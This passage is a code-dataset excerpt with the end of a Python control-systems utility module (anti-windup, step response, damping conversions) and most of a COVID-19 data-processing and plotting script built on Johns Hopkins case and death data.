C_ctr=hstack((-X*K*c,-X*Ke))\n D_ctr=hstack((zeros((nu,ni)),-X*K*D_obsy))\n\n contr=StateSpace(A_ctr,B_ctr,C_ctr,D_ctr,sys.dt)\n return contr\n \ndef set_aw(sys,poles):\n \"\"\"Divide in controller in input and feedback part\n for anti-windup\n\n Usage\n =====\n [sys_in,sys_fbk]=set_aw(sys,poles)\n\n Inputs\n ------\n\n sys: controller\n poles : poles for the anti-windup filter\n\n Outputs\n -------\n sys_in, sys_fbk: controller in input and feedback part\n \"\"\"\n sys = ss(sys)\n Ts = sys.dt\n den_old=poly(eigvals(sys.A))\n sys=tf(sys)\n den = poly(poles)\n tmp= tf(den_old,den,sys.dt)\n sys_in=tmp*sys\n sys_in = sys_in.minreal()\n sys_in = ss(sys_in)\n sys_fbk=1-tmp\n sys_fbk = sys_fbk.minreal()\n sys_fbk = ss(sys_fbk)\n return sys_in, sys_fbk\n\ndef grstep(sys, T=None):\n \"\"\"get step response graphically\n\n Usage\n =====\n grstep(sys)\n\n Inputs\n ------\n\n sys: system\n \"\"\"\n if isscalar(T):\n T = linspace(0,T)\n \n t, y = step_response(sys, T)\n plt.plot(t,y),plt.grid()\n plt.show()\n\ndef init_par(os,ts):\n \"\"\"\n Find xi and wn for given os and ts\n\n xi, wn = 
init_par(os,ts)\n \"\"\"\n xi = -log(os/100)/sqrt(pi**2 + (log(os/100))**2)\n wn = -log(0.02*sqrt(1-xi**2))/(xi*ts)\n return xi, wn\n\ndef xi2os(xi):\n \"\"\"\n Find os from given xi\n\n os = xi2os(xi)\n \"\"\"\n os = 100*exp(-xi*pi/sqrt(1-xi**2))\n return os\n\ndef os2xi(os):\n \"\"\"\n Find xi from given os\n\n xi = xi2os(os)\n \"\"\"\n xi = -log(os/100)/sqrt(pi**2 + (log(os/100))**2)\n return xi\n\ndef ts2wn(ts, xi):\n \"\"\"\n Find wn from given ts and xi\n\n wn = ts2wn(ts, xi)\n \"\"\"\n wn = -log(0.02*sqrt(1-xi**2))/(xi*ts)\n return wn\n\ndef wn2ts(wn, xi):\n \"\"\"\n Find ts from given wn and xi\n\n ts = wn2ts(wn, xi)\n \"\"\"\n ts = -log(0.02*sqrt(1-xi**2))/(xi*wn)\n return ts\n\n","sub_path":"toolbox/supsictrl/src/ctrl_utils.py","file_name":"ctrl_utils.py","file_ext":"py","file_size_in_byte":6719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"577790783","text":"import pandas as pd\nimport matplotlib.pyplot as plt \nimport matplotlib.dates as mdates \nimport numpy as np\nfrom datetime import timedelta\nfrom matplotlib.dates import date2num #-->Update \nfrom matplotlib.colors import ListedColormap\nimport json\nimport matplotlib.dates as dt \nimport geopandas as gpd\nimport datetime\n\nimport shapely.affinity as shp\nimport glob\nimport JHU_dataprocessing_functions as dp\nimport JHU_plotting_functions as jp\nimport os\n\n####--------------------parameters --------------------------------------\nplot_country = True\nplot_states = True\nsave_fig = True\nshow_plot = False\n\nbase_path = os.getcwd()\nfigs_path = os.path.join( base_path, 'figs') \n # daily_path = r'D:\\Code_projects\\Covid19_analysis\\COVID-19\\csse_covid_19_data\\csse_covid_19_daily_reports')\ndaily_path = os.path.join( base_path,\"COVID-19\\\\csse_covid_19_data\\\\csse_covid_19_daily_reports\" )\ndaily_path_us = os.path.join( base_path,\"COVID-19\\\\csse_covid_19_data\\\\csse_covid_19_daily_reports_us\" )\n\n# figure size\nfull_w = (12,7)\nhalf_w = (6,4) \n\ncols = np.array([[213,62,79],\n[244,109,67],\n[253,174,97],\n[254,224,139], \n[171,221,164], \n[50,136,189]]) /255 \ncols = np.flipud(cols)\ncmap = ListedColormap(cols) \n\nthreshold_cases = 100\nthreshold_deaths = 25\nthreshold_deaths_state = 10\n\n\n# ticks \ntick_list = [1e2,2e2,5e2,1e3,2e3,5e3,1e4,2e4,5e4,1e5,2e5,5e5,1e6,2e6,5e6,]\ntick_label_list = [100,200,500, 1000,2000,5000, '10k','20k','50k', '100k','200k','500k','1m','2m','5m']\n\n# doubling rate average period \naveraging_period = 3\n\n# china artificial days since day 0, next + china_ad\nchina_add = 6\n\n# annotation properties of figures\nbbox_props = dict(boxstyle=\"round,pad=0.1\", fc=\"w\", ec=\"w\", lw=2, alpha = 0.5)\n\nnotable_countries = ['US','Italy','Spain','China', 'France','Germany','Iran',\n 'United Kingdom','Switzerland','Turkey','Netherlands','Austria',\n 'Korea, South','Brazil' ,'Sweden','Japan',\n 'Dominican Republic', 'Russia','Ukraine' ]\n\n # compute doubling rate \nbin_array = np.array( [-1, 2.**(1./20), 2.**(1./15), 2.**(1./10), 2.**(1./7), 2.**(1./5) ,np.inf ]) \nbin_labels = ['20','15','10','7','5' ]\n\ndot_col = np.ones((3))*0.8 \nemph_col = [0.5,0.5,0.5] \ngoal_col = \"r\"\ndot_alpha = 1 \n\n\n \nif __name__ == '__main__':\n print('run script directly') \n \n # ---------------------------------------------------------\n # --------------merge and process data---------------------\n # ---------------------------------------------------------\n\n # path = 
r'D:\\Code_projects\\Covid19_analysis\\COVID-19\\csse_covid_19_data\\csse_covid_19_time_series'\n time_path = os.path.join( base_path,\"COVID-19\\\\csse_covid_19_data\\\\csse_covid_19_time_series\" )\n\n file_list = ['time_series_covid19_confirmed_global.csv',\n 'time_series_covid19_deaths_global.csv',\n 'time_series_covid19_recovered_global.csv'] \n\n # merge data \n df_country = dp.merge_countrydf(time_path, file_list) \n\n # remove diamond princess \n bool_other = df_country['Country/Region'].str.contains( 'Princess' , regex=False)\n df_country.drop( df_country[bool_other].index, inplace=True) \n\n # compute delta days\n df_country['Delta C'] = dp.days_since_threshold( df_country['Date'],\n df_country['Confirmed'],\n df_country['Country/Region'] , \n threshold_cases) \n\n df_country['Delta D'] = dp.days_since_threshold( df_country['Date'],\n df_country['Death'],\n df_country['Country/Region'] , \n threshold_deaths)\n\n # remove days from china to make plots look better \n bool_nochina = df_country['Country/Region']!= 'China'\n xCmax = df_country.loc[bool_nochina,'Delta C'].max()\n xDmax = df_country.loc[bool_nochina,'Delta D'].max()\n \n last_day = df_country['Date'].unique()[-1] \n\n # bool_last = df_country['Date'] == last_day \n bool_cases= df_country['Delta C'] > (xCmax+china_add)\n bool_deaths = df_country['Delta D'] > (xDmax+china_add)\n bool_china = df_country['Country/Region'] == 'China'\n\n df_country.loc[bool_cases & bool_china,'Delta C'] = xCmax+ china_add\n df_country.loc[bool_deaths & bool_china,'Delta D'] = xDmax+ china_add\n\n # find ratio and doubling # days\n df_country['ratio'] = dp.get_exponential_ratio( df_country['Date'], \n df_country['Confirmed'],\n df_country['Country/Region'], \n averaging_period ) \n df_country['doubling'] = pd.cut( df_country['ratio'], bin_array ,labels=range(len(bin_array)-1) , include_lowest=True )\n \n df_country['ratioD'] = dp.get_exponential_ratio( df_country['Date'], \n df_country['Death'],\n df_country['Country/Region'], \n averaging_period ) \n df_country['doublingD'] = pd.cut( df_country['ratioD'], bin_array ,labels=range(len(bin_array)-1) , include_lowest=True )\n\n \n \n df_country['Daily Confirmed'] = dp.find_daily_cases( df_country['Date'] , df_country['Confirmed'] )\n df_country['Daily Death'] = dp.find_daily_cases( df_country['Date'] , df_country['Death'] )\n \n\n df_country['Measure'] = dp.add_measures_column( 'measures_per_country.csv', \n df_country['Date'] ,\n df_country['Country/Region'])\n\n\n #--plotting map country----------------------------\n \n world = gpd.read_file(gpd.datasets.get_path('naturalearth_lowres')) \n\n countries_w = world['name'].tolist()\n countries_c = df_country['Country/Region'].unique().tolist()\n \n conversion_dict = {'United States': 'US',\n 'Taiwan': 'Taiwan*',\n 'Czech Rep.':'Czechia',\n 'Korea':'Korea, South',\n 'Dem. Rep. 
Korea': 'Korea, North',\n 'Dominican Rep.':'Dominican Republic' } \n \n world['name'] = world['name'].map(conversion_dict).fillna(world['name'])\n\n world['Cases'] = 1\n countries = world['name'].tolist()\n \n dates = df_country['Date'].unique() \n\n for country in countries: \n bool_country = df_country['Country/Region'] == country \n bool_date = df_country['Date'] == dates[-1]\n bool_prior = df_country['Date'] == dates[-7] \n \n if ((bool_country & bool_date).sum() > 0)&((bool_country&bool_prior).sum() > 0):\n now_cases = df_country.loc[bool_country&bool_date,'Confirmed'].values\n prior_cases = df_country.loc[bool_country & bool_prior,'Confirmed'].values\n latest_cases = (now_cases-prior_cases)/7\n \n if latest_cases < 1:\n latest_cases = 1\n else:\n latest_cases = 2\n \n bool_world = world['name'] == country \n world.loc[bool_world,'Cases'] = np.log(latest_cases) \n\n\n \n\n # state data import and process -------------------------------------------\n\n df_daily = dp.load_daily_reports( daily_path, daily_path_us )\n \n df_state = dp.process_daily_data( df_daily ) \n\n # adjust california funk \n bool_cal = df_state['State'] == 'California'\n bool_prior = df_state['Date'] < datetime.datetime(2020,2,10).date() \n df_state.loc[bool_cal & bool_prior,'Confirmed'] = 0 \n\n # --------------------------------------------------------------------------\n # df_state add missing dates, still to turn into function \n\n dates_unique = df_state['Date'].unique()\n dates = df_country['Date'].unique()\n # dates = df_state['Date'].unique()\n state_list = df_state['State'].unique() \n \n # find missing dates \n for state in state_list:\n # bool_state = df_state['State'] == state \n for date in dates:\n bool_state = df_state['State'] == state \n subframe = df_state.loc[bool_state,'Date'].tolist() \n if date not in subframe : \n append_series = pd.Series({'State':state,'Date':date,'Active':0,'Confirmed':0,'Deaths':0,'Recovered':0})\n df_state = df_state.append( append_series, ignore_index=True)\n \n # subframe\n bool_state = df_state['State'] == state\n df_state[bool_state].sort_values(by=['Date'])\n # --------------------------------------------------------------------------\n \n df_state['Delta C'] = dp.days_since_threshold( df_state['Date'],\n df_state['Confirmed'],\n df_state['State'] , \n threshold_cases) \n\n df_state['Delta D'] = dp.days_since_threshold( df_state['Date'],\n df_state['Deaths'],\n df_state['State'] , \n threshold_deaths_state)\n \n # # find ratio and doubling # days \n df_state['ratio'] = dp.get_exponential_ratio( df_state['Date'], \n df_state['Confirmed'],\n df_state['State'], \n averaging_period ) \n df_state['doubling'] = pd.cut( df_state['ratio'], bin_array ,labels=range(len(bin_array)-1) , include_lowest=True )\n\n\n\n df_state['ratioD'] = dp.get_exponential_ratio( df_state['Date'], \n df_state['Deaths'],\n df_state['State'], \n averaging_period ) \n df_state['doublingD'] = pd.cut( df_state['ratioD'], bin_array ,labels=range(len(bin_array)-1) , include_lowest=True )\n \n \n try_bool = df_state.groupby('State').max()['Delta C'] > 0 \n threshold_states = try_bool.index[try_bool].tolist()\n \n # something broken here, still to fix ------------------------------------------------\n\n df_state = df_state.sort_values( by=['State','Date']).reset_index(drop=True) \n\n\n df_state['Daily Confirmed'] = dp.find_daily_cases( df_state['Date'] , df_state['Confirmed'] )\n df_state['Daily Deaths'] = dp.find_daily_cases( df_state['Date'] , df_state['Deaths'] )\n \n df_state['Measure'] = 
dp.add_measures_column( 'measures_per_state.csv', \n df_state['Date'] ,\n df_state['State'])\n\n\n \n \n # ---------------------------------------------------------\n # --------------plotting country ------------------------ \n # ---------------------------------------------------------\n\n\n if plot_country:\n # -------------------log cases ---------------------------------------------------- \n try_bool = df_country.groupby('Country/Region').max()['Delta C'] > 0 \n threshold_countries = try_bool.index[try_bool].tolist()\n \n fig, ax = plt.subplots(1,1 ,figsize= full_w )\n\n\n for country in threshold_countries:\n bool_country = df_country['Country/Region'] == country \n df_pl = df_country[bool_country] \n doubling_category = df_pl['doubling'].iloc[0]\n pl1 = ax.plot( df_pl['Delta C' ], df_pl['Confirmed'],\n '.-' ,ms=3,lw=1.5, label=country,\n color = cols[doubling_category])\n \n if country in notable_countries: \n y = df_pl['Confirmed'].iloc[-1]*0.98\n x = df_pl['Delta C'].iloc[-1] + 0.5 \n t = ax.text(x,y,country, ha=\"left\", va=\"center\" , bbox=bbox_props)\n \n ax.set_yscale('log') \n ax.grid(True,which=\"major\", linestyle='-') \n ax.grid(True,which=\"minor\", linestyle=':', color=[.5,.5,.5],linewidth=0.6) \n\n xCmax = df_country.loc[bool_nochina,'Delta C'].max() \n yCmax = df_country['Confirmed'].max()\n \n ax.yaxis.set_ticks( tick_list )\n ax.yaxis.set_ticklabels( tick_label_list)\n\n ax.set_xlim([0,xCmax+10])\n ax.set_ylim([100,yCmax*2])\n\n ax.set_xlabel(\"Days since passing \"+ str(threshold_cases) + \" confirmed cases\") \n ax.set_ylabel(\"Confirmed cases\") \n\n ax.annotate('Last update: '+str( df_country['Date'].iloc[-1]), \n [.3,round(yCmax,5)*1.1], color=[.5,.5,.5], style='italic')\n\n xy = []\n sc = plt.scatter(xy, xy, c=xy, vmin=0, vmax=1, cmap=cmap)\n cax = fig.add_axes([0.65, 0.19, 0.2, 0.02])\n cb = plt.colorbar(sc, cax = cax, orientation='horizontal') \n\n cb.set_ticks(np.linspace(1/6,1,6)) \n cb.set_ticklabels( ['20','15','10','7','5']) \n cb.set_label('Doubling time in days (average over last 3)')\n cb.outline.set_visible(False)\n\n cb.ax.tick_params(which='major', length=15, width=1, direction='in',color='w')\n \n fig_name= 'covid_country_caseslog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n # -------------------country deaths ---------------------------------------------------- \n fig, ax = plt.subplots(1,1 ,figsize= full_w )\n \n for country in threshold_countries:\n bool_country = df_country['Country/Region'] == country \n df_pl = df_country[bool_country] \n doubling_category = df_pl['doublingD'].iloc[0]\n pl1 = ax.plot( df_pl['Delta D' ], df_pl['Death'] ,\n '.-' ,ms=3,lw=1.5, label=country,\n color = cols[doubling_category])\n \n if country in notable_countries: \n y = df_pl['Death'].iloc[-1]*0.98\n x = df_pl['Delta D'].iloc[-1] + 0.5 \n t = ax.text(x,y,country, ha=\"left\", va=\"center\" , bbox=bbox_props)\n \n ax.set_yscale('log') \n ax.grid(True,which=\"major\", linestyle='-') \n ax.grid(True,which=\"minor\", linestyle=':', color=[.5,.5,.5],linewidth=0.6) \n\n ax.yaxis.set_ticks( tick_list )\n ax.yaxis.set_ticklabels( tick_label_list)\n\n xDmax = df_country.loc[bool_nochina,'Delta D'].max() \n yDmax = df_country['Death'].max()\n\n ax.set_xlim([0,xDmax+10])\n ax.set_ylim([25,yDmax*2]) \n \n ax.set_xlabel(\"Days since passing \" + str(threshold_deaths)+ \" deaths\") \n ax.set_ylabel(\"Deaths\") \n\n ax.annotate('Last update: '+str( df_country['Date'].iloc[-1]), \n [.3,round(yDmax,5)*1.1], color=[.5,.5,.5], style='italic')\n \n xy = []\n sc = 
plt.scatter(xy, xy, c=xy, vmin=0, vmax=1, cmap=cmap)\n cax = fig.add_axes([0.65, 0.19, 0.2, 0.02])\n cb = plt.colorbar(sc, cax = cax, orientation='horizontal') \n cb.set_ticks(np.linspace(1/6,1,6)) \n cb.set_ticklabels( ['20','15','10','7','5']) \n cb.set_label('Doubling time in days (average over last 3)')\n cb.outline.set_visible(False)\n\n cb.ax.tick_params(which='major', length=15, width=1, direction='in',color='w')\n\n fig_name= 'covid_country_deathslog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n # ----------------plot grid of highlights-------------------------------------------------------\n \n # sort countries by confirmed cases on last date\n bool_last = df_country['Date'] == df_country['Date'].max()\n sorted_countries = df_country[bool_last].sort_values(by=['Confirmed'], ascending=False ) \n sorted_names = sorted_countries['Country/Region'].tolist() \n notable_countries = ['US','Japan','China','Italy' ,'Korea, South' ] \n\n dy = 3\n dx = 6\n fig, ax = plt.subplots( dy,dx ,figsize=full_w )\n \n for i, (ax_1, goal_country) in enumerate( zip(ax.reshape(-1), sorted_names[:(dy*dx)])): \n ax_1 = jp.plot_highlight(ax_1, goal_country, df_country['Delta C'],\n df_country['Confirmed'],\n df_country['Country/Region'],\n notable_countries,\n threshold_cases)\n ax_1 .grid(True ) \n \n if np.mod(i,dx) ==0:\n for country in threshold_countries:\n if (country in notable_countries) &( country not in goal_country):\n bool_country = df_country['Country/Region'] == country \n df_pl = df_country[bool_country] \n\n y = df_pl['Confirmed'].iloc[-1]*1.1\n x = df_pl['Delta C'].iloc[-1] + 1 \n ax_1.annotate( country ,[x,y], color=emph_col, fontsize = 8, ha='center')\n else: \n ax_1.axes.get_yaxis().set_ticklabels([])\n if i< (dy-1)*dx:\n ax_1.axes.get_xaxis().set_ticklabels([])\n \n xCmax = df_country['Delta C'].max() \n yCmax = df_country['Confirmed'].max()\n \n ax_1.set_xlim([0,xCmax+5])\n ax_1.set_ylim([100,yCmax*3])\n \n \n ax[0,0].set_ylabel('Cases') \n ax[0,0].annotate('Updated '+str( df_country['Date'].iloc[-1]), \n [6, 120], color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_country_casesHighlightLog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n # plot deaths highlight ------------------------------------------\n notable_countries = ['US','Japan','China','Italy' ,'Korea, South' ]\n dy = 3\n dx = 6\n fig, ax = plt.subplots( dy,dx ,figsize=full_w )\n \n for i, (ax_1, goal_country) in enumerate( zip(ax.reshape(-1), sorted_names[:(dy*dx)])): \n # ax_1 = plot_highlight(ax_1, goal_country, df_country) \n \n ax_1 = jp.plot_highlight(ax_1, goal_country, df_country['Delta D'],\n df_country['Death'],\n df_country['Country/Region'],\n notable_countries,\n threshold_deaths)\n \n ax_1 .grid(True ) \n \n if np.mod(i,dx) ==0:\n for country in threshold_countries:\n if (country in notable_countries) &( country not in goal_country):\n bool_country = df_country['Country/Region'] == country \n df_pl = df_country[bool_country] \n\n y = df_pl['Death'].iloc[-1]*1.1\n x = df_pl['Delta D'].iloc[-1] + 1 \n ax_1.annotate( country ,[x,y], color=emph_col, fontsize = 8, ha='center')\n else: \n ax_1.axes.get_yaxis().set_ticklabels([])\n if i< (dy-1)*dx:\n ax_1.axes.get_xaxis().set_ticklabels([])\n \n \n xDmax = df_country['Delta D'].max() \n yDmax = df_country['Death'].max()\n ax_1.set_xlim([0,xDmax+5])\n ax_1.set_ylim([25,yDmax*3])\n \n ax[0,0].set_ylabel('Deaths')\n\n ax[0,0].annotate('Updated '+str( df_country['Date'].iloc[-1]), \n [6, 28], color=[.3,.3,.3], 
style='italic',fontsize=8)\n\n fig_name= 'covid_country_deathsHighlightLog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n\n\n\n #------------------map plot \n fig, ax = plt.subplots(1,1 ,figsize=half_w)\n\n wp = world.plot(column='Cases', ax=ax, cmap='OrRd' );\n\n wp.set_xbound(-161,161)\n wp.set_ybound(-57,85) \n\n vmin = world['Cases'].min() \n vmax = world['Cases'].max() \n sm = plt.cm.ScalarMappable(cmap='OrRd', norm=plt.Normalize(vmin=vmin, vmax=vmax))\n \n sm._A = []\n cax = fig.add_axes([0.2, 0.2, 0.6, 0.03])\n cb = fig.colorbar(sm, cax=cax, orientation='horizontal')\n \n\n tick_array = [1,10,100,1000,10000, 50000 ] \n log_cases = np.log( tick_array ) \n cb.set_ticks( log_cases ) \n cb.set_ticklabels( tick_array) \n cb.set_label(' Daily case increaes \\n (average over last 7 days)')\n \n ax.axis(\"off\")\n\n ax.annotate('Updated '+str( df_country['Date'].iloc[-1]), \n [-161,-57], color=[.3,.3,.3], style='italic',fontsize=8)\n fig_name= 'covid_map' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n\n #-----daily cases worldwide-----------------------------------------------------\n df_pl = df_country.groupby( 'Date').sum() \n df_pl['Date'] = df_pl.index \n\n fig, ax = plt.subplots(1 ,2,figsize=(full_w[0],4))\n\n ax[0] = jp.plot_daily( ax[0] , df_pl['Date'], df_pl['Daily Confirmed'] )\n ax[1] = jp.plot_daily( ax[1] , df_pl['Date'], df_pl['Daily Death'] )\n\n ax[0].set_title('Worldwide Daily Confirmed')\n ax[1].set_title('Worldwide Daily Deaths') \n ax[0].legend( )\n\n\n fig_name= 'covid_world_dailycases' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n #-----daily cases per country-----------------------------------------------------\n\n # sort countries by confirmed cases on last date\n bool_last = df_country['Date'] == df_country['Date'].max()\n sorted_countries = df_country[bool_last].sort_values(by=['Confirmed'], ascending=False ) \n sorted_countries.head(5) \n \n n_countries = 12\n top_countries = sorted_countries['Country/Region'][:n_countries].tolist()\n\n\n days = df_country['Date' ].unique() \n\n dates = df_pl['Date' ].unique() \n fig, ax = plt.subplots(n_countries ,2,figsize=( full_w[0],n_countries*3))\n \n for i,country in enumerate( top_countries ):\n df_pl = df_country[ df_country['Country/Region'] == country] \n \n bool_measure = df_pl['Measure'].notnull() \n measures= df_pl.loc[bool_measure,['Measure','Date']] \n \n jp.plot_daily( ax[i,0] , df_pl['Date'], df_pl['Daily Confirmed'], measures)\n jp.plot_daily( ax[i,1] , df_pl['Date'], df_pl['Daily Death'],measures)\n \n # add comparison lines \n ax[i,0].plot( dates[[0,len(days)-1]], [1000,1000],'--',color='k', alpha = 0.5 )\n ax[i,1].plot( dates[[0,len(days)-1]], [25,25],'--',color='k', alpha = 0.5 ) \n ax[i,0].set_ylabel( country )\n \n ax[0,0].set_title('Daily Confirmed')\n ax[0,1].set_title('Daily Deaths') \n\n # reverse the order \n ax[0,0].legend( ax[0,0].get_legend_handles_labels()[0][::-1] , \n ax[0,0].get_legend_handles_labels()[1] [::-1],\n bbox_to_anchor=(0.42, .7))\n\n\n ax[0,0].annotate('1000 cases',[dates[0],1000*1.5])\n ax[0,1].annotate('25 deaths',[dates[0],25*1.5])\n\n\n ax[0,0].annotate('Updated '+str( df_country['Date'].iloc[-1]), \n [dt.date2num( dates[0] ) ,df_country['Daily Confirmed'].max()*(0.94-0.12)], \n color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_country_dailycases' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n\n\n\n\n # -----------state plots\n \n if plot_states: \n # # plot states log -----------------------------\n\n try_bool = 
df_state.groupby('State').max()['Delta C'] > 0\n threshold_states = try_bool.index[try_bool].tolist()\n\n notable_states = ['New York','New Jersey','Michigan',\"California\",\n 'Washington','Louisiana','Georgia','Utah' ]\n\n fig, ax = plt.subplots(1,1 ,figsize= full_w ) \n \n xCmax = df_state['Delta C'].max()\n yCmax = df_state['Confirmed'].max()\n\n for state in threshold_states:\n bool_state = df_state['State'] == state \n df_pl = df_state[bool_state] \n\n # print(state) \n # print(df_pl.tail() )\n\n doubling_category = df_pl['doubling'].iloc[0]\n\n pl1 = ax.plot( df_pl['Delta C' ], df_pl['Confirmed'],\n '.-' ,ms=3,lw=1.5, label=state,\n color = cols[doubling_category])\n \n y = df_pl['Confirmed'].iloc[-1]*0.98\n x = df_pl['Delta C'].iloc[-1] + 0.5 \n \n # print( x,y )\n\n if (state in notable_states) & (0 <= x <= xCmax+10) & (10<= y <= yCmax*2): \n t = ax.text(x,y,state, ha=\"left\", va=\"center\" , bbox=bbox_props)\n \n ax.set_yscale('log') \n ax.grid(True,which=\"major\", linestyle='-') \n ax.grid(True,which=\"minor\", linestyle=':', color=[.5,.5,.5],linewidth=0.6) \n \n ax.yaxis.set_ticks( tick_list )\n ax.yaxis.set_ticklabels( tick_label_list)\n\n ax.set_xlim([0,xCmax+5])\n ax.set_ylim([100,yCmax*2])\n\n ax.set_xlabel(\"Days since passing \"+ str(threshold_cases) + \" confirmed cases\") \n ax.set_ylabel(\"Confirmed cases\") \n\n ax.annotate('Last update: '+str( df_state['Date'].iloc[-1]), \n [.3,round(yCmax,5)*1.1], color=[.5,.5,.5], style='italic')\n\n # cmap = ListedColormap(cols)\n xy = []\n sc = plt.scatter(xy, xy, c=xy, vmin=0, vmax=1, cmap=cmap)\n cax = fig.add_axes([0.65, 0.19, 0.2, 0.02])\n cb = plt.colorbar(sc, cax = cax, orientation='horizontal') \n\n cb.set_ticks(np.linspace(1/6,1,6)) \n cb.set_ticklabels( bin_labels) \n cb.set_label('Doubling time in days (average over last 3)')\n cb.outline.set_visible(False)\n\n cb.ax.tick_params(which='major', length=15, width=1, direction='in',color='w')\n\n fig_name= 'covid_state_caseslog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n\n # plot states deaths--------------------------------------------\n notable_states = ['New York','New Jersey','Michigan',\"California\",'Washington','Louisiana',\"Florida\",\"Oregon\"]\n\n fig, ax = plt.subplots(1,1 ,figsize= full_w ) \n \n xDmax = df_state['Delta D'].max()\n yDmax = df_state['Deaths'].max()\n\n for state in threshold_states:\n bool_state = df_state['State'] == state \n df_pl = df_state[bool_state] \n \n doubling_category = df_pl['doublingD'].iloc[0]\n pl1 = ax.plot( df_pl['Delta D' ], df_pl['Deaths'],\n '.-' ,ms=3,lw=1.5, label=state,\n color = cols[doubling_category])\n \n y = df_pl['Deaths'].iloc[-1]*0.98\n x = df_pl['Delta D'].iloc[-1] + 0.5 \n \n if (state in notable_states) & (0 <= x <= xCmax+10) & (10<= y <= yCmax*2): \n t = ax.text(x,y,state, ha=\"left\", va=\"center\" , bbox=bbox_props)\n \n ax.set_yscale('log') \n ax.grid(True,which=\"major\", linestyle='-') \n ax.grid(True,which=\"minor\", linestyle=':', color=[.5,.5,.5],linewidth=0.6) \n\n ax.yaxis.set_ticks( tick_list )\n ax.yaxis.set_ticklabels( tick_label_list)\n\n ax.set_xlim([0,xDmax+5])\n ax.set_ylim([10,yDmax*2])\n\n ax.set_xlabel(\"Days since passing \"+ str(threshold_deaths_state)+ \" confirmed cases\") \n ax.set_ylabel(\"Confirmed deaths\") \n\n ax.annotate('Last update: '+str( df_state['Date'].iloc[-1]), \n [.3,round(yDmax,5)*1.1], color=[.5,.5,.5], style='italic')\n \n xy = []\n sc = plt.scatter(xy, xy, c=xy, vmin=0, vmax=1, cmap=cmap)\n cax = fig.add_axes([0.65, 0.19, 0.2, 0.02])\n cb = 
plt.colorbar(sc, cax = cax, orientation='horizontal') \n\n cb.set_ticks(np.linspace(1/6,1,6)) \n cb.set_ticklabels(bin_labels) \n cb.set_label('Doubling time in days (average over last 3)')\n cb.outline.set_visible(False)\n\n cb.ax.tick_params(which='major', length=15, width=1, direction='in',color='w')\n\n fig_name= 'covid_state_deathslog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n\n # ----------------plot grid of highlights-------------------------------------------------------\n # sort states by confirmed cases on last date\n bool_last = df_state['Date'] == df_state['Date'].max()\n sorted_states = df_state[bool_last].sort_values(by=['Confirmed'], ascending=False ) \n sorted_names = sorted_states['State'].tolist()\n\n notable_states = ['New York', 'Washington' ]\n\n dy = 3\n dx = 6\n\n fig, ax = plt.subplots( dy,dx ,figsize=full_w )\n \n for i, (ax_1, goal_states) in enumerate( zip(ax.reshape(-1), sorted_names[:(dy*dx)])): \n ax_1 = jp.plot_highlight(ax_1, goal_states, df_state['Delta C'],\n df_state['Confirmed'],\n df_state['State'],\n notable_states,\n threshold_cases)\n ax_1 .grid(True ) \n \n if np.mod(i,dx) ==0:\n for state in threshold_states:\n if (state in notable_states) &( state not in goal_states):\n bool_state = df_state['State'] == state\n df_pl = df_state[bool_state] \n\n y = df_pl['Confirmed'].iloc[-1]*1.1\n x = df_pl['Delta C'].iloc[-1] + 1 \n ax_1.annotate( state ,[x,y], color=emph_col, fontsize = 8, ha='center')\n else: \n ax_1.axes.get_yaxis().set_ticklabels([])\n if i< (dy-1)*dx:\n ax_1.axes.get_xaxis().set_ticklabels([])\n \n xCmax = df_state['Delta C'].max() \n yCmax = df_state['Confirmed'].max()\n \n ax_1.set_xlim([0,xCmax+5])\n ax_1.set_ylim([100,yCmax*3])\n \n ax[0,0].set_ylabel('Cases') \n ax[0,0].annotate('Updated '+str( df_state['Date'].iloc[-1]), \n [6, 120], color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_state_casesHighlightLog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n \n # ----------------plot grid of deaths highlights-------------------------------------------------------\n \n notable_states = ['New York' ,'Washington', 'California' ]\n \n dy = 3\n dx = 6\n\n fig, ax = plt.subplots( dy,dx ,figsize=full_w )\n \n for i, (ax_1, goal_states) in enumerate( zip(ax.reshape(-1), sorted_names[:(dy*dx)])): \n ax_1 = jp.plot_highlight(ax_1, goal_states, df_state['Delta D'],\n df_state['Deaths'],\n df_state['State'],\n notable_states,\n threshold_deaths)\n ax_1 .grid(True ) \n \n if np.mod(i,dx) ==0:\n for state in threshold_states:\n if (state in notable_states) &( state not in goal_states):\n bool_state = df_state['State'] == state\n df_pl = df_state[bool_state] \n\n y = df_pl['Deaths'].iloc[-1]*1.1\n x = df_pl['Delta D'].iloc[-1] + 1 \n ax_1.annotate( state ,[x,y], color=emph_col, fontsize = 8, ha='center')\n else: \n ax_1.axes.get_yaxis().set_ticklabels([])\n if i< (dy-1)*dx:\n ax_1.axes.get_xaxis().set_ticklabels([])\n \n xCmax = df_state['Delta D'].max() \n yCmax = df_state['Deaths'].max()\n \n ax_1.set_xlim([0,xCmax+5])\n ax_1.set_ylim([10,yCmax*3])\n \n \n ax[0,0].set_ylabel('Deaths') \n ax[0,0].annotate('Updated '+str( df_state['Date'].iloc[-1]), \n [6, 12 ], color=[.3,.3,.3], style='italic',fontsize=8)\n\n fig_name= 'covid_state_deathsHighlightLog' \n if save_fig: \n jp.save_fig( figs_path, fig_name) \n \n # # plot daily for US, by state data-----------------------------\n df_pl = df_state.groupby( 'Date').sum() \n df_pl['Date'] = df_pl.index \n\n fig, ax = plt.subplots(1 ,2,figsize=(full_w[0] ,4))\n\n ax[0] = 
